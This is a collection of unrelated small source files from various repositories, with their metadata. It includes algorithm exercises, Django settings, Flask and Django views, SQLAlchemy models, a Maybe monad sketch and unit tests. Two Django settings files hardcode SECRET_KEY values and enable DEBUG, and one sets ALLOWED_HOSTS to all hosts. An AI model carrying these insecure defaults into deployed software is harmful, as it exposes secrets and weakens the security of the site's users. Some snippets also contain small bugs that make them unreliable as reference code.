| 2020-05-30T03:28:39
| 2020-05-30T03:28:39
| 227,313,730
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
"""
请定义一个队列并实现函数 max_value 得到队列里的最大值,要求函数max_value、push_back 和 pop_front 的均摊时间复杂度都是O(1)。
若队列为空,pop_front 和 max_value 需要返回 -1
示例 1:
输入:
["MaxQueue","push_back","push_back","max_value","pop_front","max_value"]
[[],[1],[2],[],[],[]]
输出: [null,null,null,2,1,2]
示例 2:
输入:
["MaxQueue","pop_front","max_value"]
[[],[],[]]
输出: [null,-1,-1]
"""
class MaxQueue:
def __init__(self):
from collections import deque
self.queue = deque()
self.max_queue = deque()
def max_value(self) -> int:
if self.max_queue:
return self.max_queue[0]
return -1
def push_back(self, value: int) -> None:
self.queue.append(value)
while self.max_queue and value >= self.max_queue[-1]:
self.max_queue.pop()
self.max_queue.append(value)
def pop_front(self) -> int:
if self.max_queue and self.queue:
value = self.queue.popleft()
if value == self.max_queue[0]:
self.max_queue.popleft()
else:
value = -1
return value
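# A minimal usage sketch (not part of the original solution) reproducing Example 1
# from the docstring above; expected outputs are noted in the comments.
if __name__ == "__main__":
    q = MaxQueue()
    print(q.max_value())  # -1, the queue is empty
    q.push_back(1)
    q.push_back(2)
    print(q.max_value())  # 2
    print(q.pop_front())  # 1
    print(q.max_value())  # 2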
|
[
"244492644@qq.com"
] |
244492644@qq.com
|
c7d7be82b06fe11ec65fb84ae4c2af426f64c544
|
bb1aec23bfc9accfc247382702a3d5bf297421d0
|
/djresthw/settings.py
|
3bd64b1d64a7acf4b99fbc75083a36237112be68
|
[] |
no_license
|
KenJi544/djrest
|
d06ada70739c3aa777999ebdcf12cc6e559e3ecc
|
6c3051357619ce844bd7d00811364d8ee45ebded
|
refs/heads/master
| 2020-06-05T20:35:50.715007
| 2019-06-18T12:54:36
| 2019-06-18T12:54:36
| 192,539,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,238
|
py
|
"""
Django settings for djresthw project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'yaxty8(=9ab9byq^k91h5rmuqo)dtl6=cx_7r&)(9=s+ce+%dp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djresthw.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djresthw.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
|
[
"dan@smartsoftdev.eu"
] |
dan@smartsoftdev.eu
|
ab88d984c56fab8df7b123df290ae712ef6252cf
|
76e91717f7b2c20061de75f27c445736869b3051
|
/BasicCrickulator.py
|
74b0f39da27a49814e99642bd6c470ebc8265805
|
[] |
no_license
|
dalzuga/Crickulator
|
67047fb866038187c0107f3d2e7fbb761d2ed647
|
e0a53f77a55e5feb0b9671140bf09da369b3c0ef
|
refs/heads/master
| 2021-01-18T09:39:00.351126
| 2016-09-12T16:46:47
| 2016-09-12T16:46:47
| 68,026,214
| 0
| 0
| null | 2016-09-12T16:21:19
| 2016-09-12T16:21:19
| null |
UTF-8
|
Python
| false
| false
| 1,029
|
py
|
#!/bin/python
print"This program converts temperatures between Fahrenheit, Celsius, Kelvin, and Bug chirps."
temp, unit = raw_input("Please enter the temperature and the unit (F, C, K, or B): ").split()
temp = int(temp)
print temp
print unit
if unit == "F":
celsius = (temp - 32) / 1.8
kelvin = (temp + 459.67) * .55
chirps = (temp - 40) * 4
print("%d degrees Fahrenheit equals:\n\t%d Celsius\n\t%d Kelvin\n\t%d cricket chirps per minute\n") % (temp, celsius, kelvin, chirps)
#nope, didn't make up the cricket thing: http://www.scientificamerican.com/article/bring-science-home-cricket-temperature/
#write tests first
#needs to handle negatives
#could have better accuracy if using floats not ints everywhere?
#include over 100 F "too hot for crickets" and under 55 F "too cold for crickets", also a funny message for below freezing "cricketsicles don't chirp"?
#include funny message for lower than abs zero
#include funny message about "at -40 it's so cold that no one cares if it's F or C"
|
[
"nwilliammccann@gmail.com"
] |
nwilliammccann@gmail.com
|
3f84178579df9e1381f23307dfbcdebae314e114
|
503413c4e4b7f2b87797dcddcf16d2c3f2282016
|
/A4/test_breakdown_amount.py
|
008cf59cf8ed072b005e658c2bd718adbdf77281
|
[] |
no_license
|
marlonrenzo/A01054879_1510_assignments
|
c1475a3fd263a8a6a1234ffd0818a75706e6194f
|
f4a3f9af21f7170ba70c901bc22ff6d95a6e535f
|
refs/heads/master
| 2022-03-23T22:07:29.067075
| 2019-12-08T19:01:32
| 2019-12-08T19:01:32
| 209,661,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,464
|
py
|
from unittest import TestCase
from A4.Question_5 import breakdown_amount
class TestBreakdownAmount(TestCase):
def test_breakdown_amount_one_hundred_one(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 101.0
actual = breakdown_amount(test, test_amount)
expected = {100: 1, 1: 1}
self.assertEqual(actual, expected)
def test_breakdown_amount_4(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 4.0
actual = breakdown_amount(test, test_amount)
expected = {2: 2}
self.assertEqual(actual, expected)
def test_breakdown_amount_40_cents(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 0.4
actual = breakdown_amount(test, test_amount)
expected = {0.25: 1, 0.1: 1, 0.05: 1}
self.assertEqual(actual, expected)
def test_breakdown_amount_90_cents(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
        test_amount = 0.9
        actual = breakdown_amount(test, test_amount)
        # 90 cents = 3 quarters + 1 dime + 1 nickel under the greedy breakdown assumed by the other cases
        expected = {0.25: 3, 0.1: 1, 0.05: 1}
self.assertEqual(actual, expected)
def test_breakdown_amount_9(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 9.0
actual = breakdown_amount(test, test_amount)
expected = {5: 1, 2: 2}
self.assertEqual(actual, expected)
def test_breakdown_amount_4_cents(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 0.04
actual = breakdown_amount(test, test_amount)
expected = {0.01: 4}
self.assertEqual(actual, expected)
def test_breakdown_amount_int(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 4
expected = TypeError
self.assertRaises(expected, breakdown_amount, test)
def test_breakdown_amount_string(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 'five dollars'
expected = TypeError
self.assertRaises(expected, breakdown_amount, test, test_amount)
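# A minimal greedy implementation consistent with the tests above (a sketch only;
# the real A4.Question_5.breakdown_amount under test may differ in detail):
#
#   def breakdown_amount(denominations, amount):
#       if not isinstance(amount, float):
#           raise TypeError("amount must be a float")
#       remaining = int(round(amount * 100))  # work in cents to avoid float rounding errors
#       used = {}
#       for denom in sorted(denominations, reverse=True):
#           count, remaining = divmod(remaining, int(round(denom * 100)))
#           if count:
#               used[denom] = count
#       return used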
|
[
"marlonrfajardo@gmail.com"
] |
marlonrfajardo@gmail.com
|
7d2dd5d6386b11b1f3d8df9469fa3d749015aee6
|
4830c991616800e7e4d1e9da87f822655b996859
|
/Ch7E4_TriviaV1.3.0/high_score.py
|
c92ccc150bd0b8b9904ca95162f2fb8fded3c831
|
[] |
no_license
|
malmhaug/Py_AbsBegin
|
daf72786e11118a5586a169ea66203f615fbaeed
|
c1e12491a4998c35e86e46010adf9a14e735d667
|
refs/heads/master
| 2021-01-17T13:20:04.143941
| 2016-08-01T18:24:29
| 2016-08-01T18:24:29
| 48,393,823
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,742
|
py
|
import sys
def open_file(file_name, mode):
"""Open a file."""
try:
the_file = open(file_name, mode)
except IOError as e:
print("Unable to open the file", file_name, "Ending program.\n", e)
input("\n\nPress the enter key to exit.")
sys.exit()
else:
return the_file
def high_scores(score):
new_lines = []
no_name = 0
name = input("\nEnter your name --> ")
score_file = open_file("high_scores.txt", "r")
lines = score_file.readlines()
score_file.close()
# If file is empty, write name and score
if len(lines) < 1:
print("Empty file")
new_lines.append(str(score) + ':' + name + '\n')
# Transfer from lines to new_lines
for entry in lines:
new_lines.append(entry)
# Check for new names
for entry in range(len(new_lines)):
if new_lines[entry].find(name) == -1:
no_name += 1
if no_name >= len(new_lines):
print("New name")
new_lines.append(str(score) + ':' + name + '\n')
# Check score for names already in list
for entry in range(len(new_lines)):
position = new_lines[entry].find(':')
old_score = int(new_lines[entry][:position])
if name in new_lines[entry] and old_score < score:
print("New score for person in list")
new_lines[entry] = str(score) + ':' + name + '\n'
# Sort list
new_lines.sort(reverse=True)
print("HIGH SCORE\n")
for entry in new_lines:
print(entry)
score_file = open_file("high_scores.txt", "w")
score_file.writelines(new_lines)
score_file.close()
if __name__ == '__main__':
high_scores(16)
|
[
"malmhaug@gmail.com"
] |
malmhaug@gmail.com
|
befd93169d42e555fdce72b8a3b9244d111ec2e2
|
524885e37b29d9bb6fe86017d41691cf8e74050d
|
/kungfu_blog/settings.py
|
55063af89ea5601bb82fd6489455a4d818b5fdee
|
[] |
no_license
|
manas-anarov/kungfu_blog
|
1cc3cd2f6e0a3afd98e5089c198677eea08b71b7
|
6fa88805ed3921406f4d34cd962eaa3e3250a1d7
|
refs/heads/master
| 2020-07-11T12:06:14.720355
| 2019-08-27T11:50:22
| 2019-08-27T11:50:22
| 204,534,701
| 0
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,329
|
py
|
"""
Django settings for kungfu_blog project.
Generated by 'django-admin startproject' using Django 2.0.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3#=+amb1f51b12eryfo+zer9pi!6x016fk-af=^6mxdlhuwy&e'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'mypost',
'myprofile',
'myaccount',
'restpost',
'restaccount',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'kungfu_blog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'kungfu_blog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'restaccount.DriverUser'
LOGIN_REDIRECT_URL = '/profile/list'
|
[
"microsoft.kg@mail.ru"
] |
microsoft.kg@mail.ru
|
a593bb9c456bb9b578077de9086795fec3de27e3
|
0d38affd6dd98a7e3d5400fb090f15f2e5b84328
|
/web_app/views.py
|
00684a672016809e5af4438d2f505ce0fca3276d
|
[] |
no_license
|
sangireddyabhilash/FASTSIM
|
400e47386b17f4ea9c077038cd1ee488319f5500
|
286a5b4464851297667296f9cc355195765d2423
|
refs/heads/master
| 2020-08-30T04:23:23.133878
| 2019-10-29T10:55:13
| 2019-10-29T10:55:13
| 218,261,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,690
|
py
|
from django.shortcuts import render
from rest_framework.views import APIView
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.parsers import MultiPartParser
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from itertools import product
from .serializers import Forum1, Forum2
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import LinearRegression, Ridge, BayesianRidge, RANSACRegressor, TheilSenRegressor, HuberRegressor, Lasso
from sklearn.svm import SVR
from sklearn.neighbors import KNeighborsRegressor
import csv
from django.http import HttpResponse
import pandas as pd
import numpy as np
from io import StringIO
class Forum1View(APIView):
renderer_classes = [ TemplateHTMLRenderer,]
template_name = "forum1.html"
def get(self, request):
serializer = Forum1()
return Response({"serializer":serializer})
def post(self, request):
data = {"num_clusters":request.data["num_clusters"]}
for key in ['wwr', 'ar', 'orin', 'shgc', 'oh']:
data[key] = list(map(float, request.data[key].split(",")))
ser = Forum1(data = data)
if ser.is_valid():
key_lists = []
for key in ['wwr', 'ar', 'orin', 'shgc', 'oh']:
key_lists.append(data[key])
combinations = list(product(*key_lists))
print(combinations)
k_means = KMeans(n_clusters = ser.data["num_clusters"])
k_means.fit(combinations)
centers = k_means.cluster_centers_.tolist()
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="somefilename.csv"'
writer = csv.writer(response)
writer.writerows(centers)
return response
print(ser.errors)
return APIException()
class Forum2View(APIView):
renderer_classes = [ TemplateHTMLRenderer,]
template_name = "forum2.html"
parser_classes = [MultiPartParser,]
def get(self, request):
serializer = Forum2()
return Response({"serializer":serializer})
def __get_regressor(self, choice):
if choice == "des_tree":
return DecisionTreeRegressor
if choice == "linear_reg":
return LinearRegression
if choice == "svr":
return SVR
if choice == "ridge":
return Ridge
if choice == "lasso":
return Lasso
if choice == "bayesian_ridge":
return BayesianRidge
if choice == "ransac":
return RANSACRegressor
if choice == "theil_sen":
return TheilSenRegressor
if choice == "huber_reg":
return HuberRegressor
if choice == "k_neighbor":
return KNeighborsRegressor
def post(self, request):
csv_file = StringIO(request.data["csv"].read().decode("utf-8"))
dataTrain = pd.read_csv(csv_file)
trainingData = dataTrain[['WWR','AR','ORIN','OVERHANG','SHGC']]
trainingScores = dataTrain['ENERGY']
trainingData = trainingData.values
trainingScores = trainingScores.values
min_max_scaler = MinMaxScaler()
trainingData = min_max_scaler.fit_transform(trainingData)
data = {}
for key in ['wwr', 'ar', 'orin', 'oh', 'shgc']:
data[key] = list(map(float, request.data[key].split(",")))
data["regressor"] = request.data["regressor"]
ser = Forum2(data = data)
if not ser.is_valid():
return APIException()
key_lists = []
for key in ['wwr', 'ar', 'orin', 'oh', 'shgc']:
key_lists.append(data[key])
combinations = list(product(*key_lists))
predictionData = np.array(combinations)
        # use transform (not fit_transform) so predictions are scaled with the ranges learned from the training data
        predictionData = min_max_scaler.transform(predictionData)
regressor = self.__get_regressor(data["regressor"])
clf = regressor()
clf.fit(trainingData, trainingScores)
results = clf.predict(predictionData)
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="results.csv"'
writer = csv.DictWriter(response, ['wwr', 'ar', 'orin', 'oh', 'shgc',"scores"])
for i in range(predictionData.shape[0]):
writer.writerow({"wwr":combinations[i][0],"ar":combinations[i][1],"orin":combinations[i][2],"oh":combinations[i][3],"shgc":combinations[i][4],"scores":results[i]})
return response
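# A minimal request sketch for Forum1View (hypothetical client code; the URL path is
# an assumption, only the field names and formats are taken from the view above):
#
#   import requests
#   data = {"num_clusters": 3, "wwr": "0.2,0.4", "ar": "1.0,1.5", "orin": "0,90",
#           "shgc": "0.25,0.4", "oh": "0.3,0.6"}
#   requests.post("http://localhost:8000/forum1/", data=data)  # returns a CSV of cluster centers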
|
[
"abhilash.sangireddy@sprinklr.com"
] |
abhilash.sangireddy@sprinklr.com
|
fc0d048ffd7503c409ac2f5cf15aa5e8d92a10f5
|
38ad0af18203d8c21458e5f83434cc338a477bd3
|
/v1/maybe.py
|
bc164db0efef75b88068be9aeb49032f5081f79a
|
[] |
no_license
|
OaklandPeters/learning_monads
|
111c39f6285de9ada7c08960b88f1e3a89338637
|
9af7ffad2e2ca5f3275f47cff1052fe83e093598
|
refs/heads/master
| 2016-08-12T15:42:35.762982
| 2016-05-09T19:05:42
| 2016-05-09T19:05:42
| 49,683,084
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,467
|
py
|
#!/usr/bin/env python3
"""
Ok, I'm just arbitrarily defining this 'Maybe' as Maybe error.
Idea for treatment:
Have 'lift' just be a wrap (even when used as a decorator).
So, that lift(function) --> an object whose __call__ triggers f_apply
"""
from typing import Callable, TypeVar, Iterator, Any
from monad import Monad, classproperty
AccessorErrors = (AttributeError, IndexError, KeyError)
def maybe_error(*exceptions):
"""
Turns a normal function into one returning Maybe.
This is basically 'fmap' for Maybe.
Although, you have to pass it an exception type first.
"""
def wrapper(function):
def wrapped(*args, **kwargs):
try:
return Just(function(*args, **kwargs))
            except exceptions:  # catch any of the passed-in exception types
return Nothing()
return wrapped
return wrapper
class Maybe:
def __init__(self, *elements, exceptions=AccessorErrors):
self.exceptions = exceptions
self.data = elements
def f_apply(self, function):
try:
return Just(function(*self.data))
except self.exceptions:
return Nothing()
def f_map(self):
def wrapped(*args, **kwargs):
function = self.data[0] # This is not a safe assumption, that there is exactly 1 elem
try:
return Just(function(*args, **kwargs))
except self.exceptions:
return Nothing()
return wrapped
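# A minimal usage sketch (assuming Just and Nothing are simple Maybe subclasses
# defined elsewhere in this project; they are not defined or imported in this file):
#
#   safe_first = maybe_error(IndexError)(lambda seq: seq[0])
#   safe_first([1, 2, 3])   # -> Just(1)
#   safe_first([])          # -> Nothing()
#
#   Maybe({'a': 1}).f_apply(lambda d: d['missing'])   # -> Nothing(), the KeyError is caught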
|
[
"oakland.peters@gmail.com"
] |
oakland.peters@gmail.com
|
1b29971349c8bd365a97cad27882735328b1de32
|
b8aa670d8328ac47d4cd9849a8c1624731f46674
|
/webapp/views/index.py
|
d61f3e5381f42a61b5f0eec5874c363a1f4df5f6
|
[] |
no_license
|
danlliu/webapp
|
54744c2304652a3dd08ed76dfa16243a08fec3de
|
18278131e3e8fe208640ff5751e8c53a7b82689e
|
refs/heads/main
| 2023-09-03T05:19:22.548631
| 2021-10-28T03:54:48
| 2021-10-28T03:54:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 624
|
py
|
import flask
from flask import request, session
import webapp
@webapp.app.route('/')
def webapp_index():
if 'username' in session:
return flask.render_template('index.html', **{'logname': session['username']})
return flask.render_template('index-nologin.html')
@webapp.app.route('/users/')
@webapp.app.route('/users/<username>/')
@webapp.app.route('/profile/')
@webapp.app.route('/friends/')
def webapp_alt_index(username=None):
if 'username' in session:
return flask.render_template('index.html', **{'logname': session['username']})
return flask.redirect(flask.url_for('webapp_index'))
|
[
"danlliu@umich.edu"
] |
danlliu@umich.edu
|
14248fcb0ff7af8bc89af5140584b7be4da9c118
|
fd547ec5dd01039b5a0b89c1e3c14e39a7532f37
|
/cms/wizards/views.py
|
6e55e3d0d7e459337cf0884c6f38f084279bbe8b
|
[
"BSD-3-Clause"
] |
permissive
|
leoiceo/django-cms
|
30e4a7a4b0b8555613368b28ba4dfb8eee4dac8b
|
2709fa6ffb5f4fadba91da48a2557438c0edc576
|
refs/heads/develop
| 2021-01-18T04:41:51.724354
| 2015-10-22T17:16:23
| 2015-10-22T17:16:23
| 44,788,187
| 0
| 1
| null | 2015-10-23T03:18:39
| 2015-10-23T03:18:39
| null |
UTF-8
|
Python
| false
| false
| 5,416
|
py
|
# -*- coding: utf-8 -*-
import os
from django.forms import Form
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.db import transaction
from django.template.response import SimpleTemplateResponse
from django.utils.translation import get_language_from_request
try:
# This try/except block can be removed when we stop supporting Django 1.6
from django.contrib.formtools.wizard.views import SessionWizardView
except ImportError: # pragma: no cover
# This is fine from Django 1.7
from formtools.wizard.views import SessionWizardView
from cms.models import Page
from .wizard_pool import wizard_pool
from .forms import (
WizardStep1Form,
WizardStep2BaseForm,
step2_form_factory,
)
class WizardViewMixin(object):
language_code = None
@transaction.atomic()
def dispatch(self, request, *args, **kwargs):
self.language_code = get_language_from_request(request, check_path=True)
response = super(WizardViewMixin, self).dispatch(
request, *args, **kwargs)
return response
def get_form_kwargs(self):
kwargs = super(WizardViewMixin, self).get_form_kwargs()
kwargs.update({'wizard_language': self.language_code})
return kwargs
class WizardCreateView(WizardViewMixin, SessionWizardView):
template_name = 'cms/wizards/start.html'
file_storage = FileSystemStorage(
location=os.path.join(settings.MEDIA_ROOT, 'wizard_tmp_files'))
form_list = [
('0', WizardStep1Form),
# Form is used as a placeholder form.
# the real form will be loaded after step 0
('1', Form),
]
def get_current_step(self):
"""Returns the current step, if possible, else None."""
try:
return self.steps.current
except AttributeError:
return None
def is_first_step(self, step=None):
step = step or self.get_current_step()
return step == '0'
def is_second_step(self, step=None):
step = step or self.get_current_step()
return step == '1'
def get_context_data(self, **kwargs):
context = super(WizardCreateView, self).get_context_data(**kwargs)
if self.is_second_step():
context['wizard_entry'] = self.get_selected_entry()
return context
def get_form(self, step=None, data=None, files=None):
if step is None:
step = self.steps.current
# We need to grab the page from pre-validated data so that the wizard
# has it to prepare the list of valid entries.
if data:
page_key = "{0}-page".format(step)
self.page_pk = data.get(page_key, None)
else:
self.page_pk = None
if self.is_second_step(step):
self.form_list[step] = self.get_step_2_form(step, data, files)
return super(WizardCreateView, self).get_form(step, data, files)
def get_form_kwargs(self, step=None):
"""This is called by self.get_form()"""
kwargs = super(WizardCreateView, self).get_form_kwargs()
kwargs['wizard_user'] = self.request.user
if self.is_second_step(step):
kwargs['wizard_page'] = self.get_origin_page()
else:
page_pk = self.page_pk or self.request.GET.get('page', None)
kwargs['wizard_page'] = Page.objects.filter(pk=page_pk).first()
return kwargs
def get_form_initial(self, step):
"""This is called by self.get_form()"""
initial = super(WizardCreateView, self).get_form_initial(step)
if self.is_first_step(step):
initial['page'] = self.request.GET.get('page')
return initial
def get_step_2_form(self, step=None, data=None, files=None):
entry_form_class = self.get_selected_entry().form
step_2_base_form = self.get_step_2_base_form()
form = step2_form_factory(
mixin_cls=step_2_base_form,
entry_form_class=entry_form_class,
)
return form
def get_step_2_base_form(self):
"""
Returns the base form to be used for step 2.
This form is sub classed dynamically by the form defined per module.
"""
return WizardStep2BaseForm
def get_template_names(self):
if self.is_first_step():
template_name = self.template_name
else:
template_name = self.get_selected_entry().template_name
return template_name
def done(self, form_list, **kwargs):
"""
This step only runs if all forms are valid. Simply emits a simple
template that uses JS to redirect to the newly created object.
"""
form_two = form_list[1]
instance = form_two.save()
context = {
"url": self.get_success_url(instance),
}
return SimpleTemplateResponse("cms/wizards/done.html", context)
def get_selected_entry(self):
data = self.get_cleaned_data_for_step('0')
return wizard_pool.get_entry(data['entry'])
def get_origin_page(self):
data = self.get_cleaned_data_for_step('0')
return data.get('page')
def get_success_url(self, instance):
entry = self.get_selected_entry()
success_url = entry.get_success_url(
obj=instance,
language=self.language_code
)
return success_url
|
[
"mkoistinen@gmail.com"
] |
mkoistinen@gmail.com
|
c9a133dd357d3b31b1ef805daf0f051cdb6e004d
|
f25522aef57cbe5e3d6970ed2d9d1f0d8e1901d0
|
/FYP/Code/sample.py
|
dc125c6572c128990961beac3d3b326b0fdcc0ed
|
[] |
no_license
|
txs640/FinalYearProject
|
75f615a53fdb71043e2dfad0deca3434415d877a
|
b6ae7dad29e19a28138b2c4f6d185dc1fb25a23a
|
refs/heads/master
| 2020-04-08T00:04:51.173940
| 2019-01-18T19:04:38
| 2019-01-18T19:04:38
| 158,837,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29
|
py
|
function setup(){
}
|
[
"txs640@student.bham.ac.uk"
] |
txs640@student.bham.ac.uk
|
2f7549c4baa76bb0dbc1bf9eacce548d49027078
|
ae9ffbe5924eedbac57af535d0f20819b58f3bcb
|
/examples/myblog/models/models.py
|
da68560df66b05b146de3208eeed115feb504aef
|
[] |
no_license
|
natsuooo/fujitsu
|
d981946c66bca5be1e6cac89393f61cab6355cf2
|
866f0218776642842a769afb0ccafe9c7b5e32a2
|
refs/heads/master
| 2023-03-17T14:55:17.511679
| 2021-02-22T01:27:10
| 2021-02-22T01:27:10
| 338,940,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 966
|
py
|
from sqlalchemy import Column, Integer, String, Text, DateTime
from datetime import datetime
from models.database import Base
class BlogContent(Base):
__tablename__ = "blogcontent"
id = Column(Integer,primary_key=True)
title = Column(String(128),unique=True)
body = Column(Text)
    date = Column(DateTime, default=datetime.now)  # pass the callable so each insert gets its own timestamp
def __init__(self, title=None,body=None,date=None):
self.title = title
self.body = body
self.date = date
def __repr__(self):
return "<BlogContent(title='%s',body='%s',date='%s')>" % (self.title, self.body,self.date)
class Users(Base):
__tablename__ = "users"
id = Column(Integer,primary_key=True)
name = Column(Text,unique=True)
password = Column(Text)
def __init__(self,name=None,password=None):
self.name = name
self.password = password
def __repr__(self):
return "<Users(name='%s', password='%s')>" % (self.name, self.password)
|
[
"n17975775@gmail.com"
] |
n17975775@gmail.com
|
54c71ab19988dc61b1d5006d7e3fb63925a63436
|
2ff2d654688cf8687c0806135057c747763f9cbc
|
/.github/workflows/dark.py
|
ac99b00dce47474159cbc869011802a04be1b760
|
[] |
no_license
|
darshankhakhodiya143/dark1
|
61f27a14c2afe9cf3e22c39339ffcdf11a408796
|
924859631a950ca86ae786a5f5c3c4954b6a5117
|
refs/heads/master
